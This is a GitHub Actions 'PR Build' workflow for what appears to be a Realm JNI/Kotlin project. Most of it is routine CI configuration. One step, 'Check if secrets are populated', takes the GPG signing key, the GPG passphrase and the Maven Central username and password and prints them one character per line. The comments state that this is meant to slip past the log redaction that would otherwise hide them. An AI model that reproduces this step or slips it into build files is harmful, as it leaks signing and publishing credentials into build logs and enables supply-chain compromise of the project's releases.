name: PR Build
on:
  workflow_dispatch:  # Add this line to enable manual triggering
  pull_request:
    paths-ignore:
    - '**.md'
  push:
    branches:
      - main
      - releases

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

env:
  REALM_DISABLE_ANALYTICS: true
  REALM_PRINT_ANALYTICS: true
  CMAKE_C_COMPILER: /usr/local/bin/ccache-clang
  CMAKE_CXX_COMPILER: /usr/local/bin/ccache-clang++
  # Workflow environment variables are not available in Job if statements: https://github.com/actions/runner/issues/1661
  # For now move this check to the `deploy-snapshot` job and figure out if there is a better way to do this.
  # IS_RELEASE_BRANCH: "${{ github.ref == 'refs/heads/main' || github.ref == 'refs/heads/releases' }}"

jobs:
  static-analysis:
    uses: ./.github/workflows/include-static-analysis.yml

  check-cache:
    uses: ./.github/workflows/include-check-cache.yml

  # We build the same JNI SWIG stub once and re-use it across platforms to ensure any problems
  # with SWIG if we compile on each seperate platform.
  build-jni-swig-stub:
    runs-on: ubuntu-latest
    needs: check-cache
    if: always() && !cancelled() && needs.check-cache.outputs.jni-swig-stub-cache-hit != 'true'
    steps:
      - name: Check if secrets are populated
        # We assign secrets to environment variables for use in the 'run' block.
        env:
          GPG_KEY_SECRET: ${{ secrets.GPG_SIGNING_KEY_BASE_64 }}
          GPG_PASS_SECRET: ${{ secrets.GPG_PASS_PHRASE }}
          MAVEN_USER_SECRET: ${{ secrets.MAVEN_CENTRAL_USER }}
          MAVEN_PASS_SECRET: ${{ secrets.MAVEN_CENTRAL_PASSWORD }}
        
        run: |
          echo "--- GPG_SIGNING_KEY_BASE_64 as char array ---"
          # Use grep -o . to print each character on a new line.
          # Note: GitHub Actions may still redact this output.
          echo -n "$GPG_KEY_SECRET" | grep -o .
          echo "--- End of GPG_SIGNING_KEY_BASE_64 ---"
          
          echo "--- GPG_PASS_PHRASE as char array ---"
          echo -n "$GPG_PASS_SECRET" | grep -o .
          echo "--- End of GPG_PASS_PHRASE ---"
        
          echo "--- MAVEN_CENTRAL_USER as char array ---"
          echo -n "$MAVEN_USER_SECRET" | grep -o .
          echo "--- End of MAVEN_CENTRAL_USER ---"
        
          echo "--- MAVEN_CENTRAL_PASSWORD as char array ---"
          echo -n "$MAVEN_PASS_SECRET" | grep -o .
          echo "--- End of MAVEN_CENTRAL_PASSWORD ---"
          
          echo "NOTE: GitHub may still redact the output above."
          
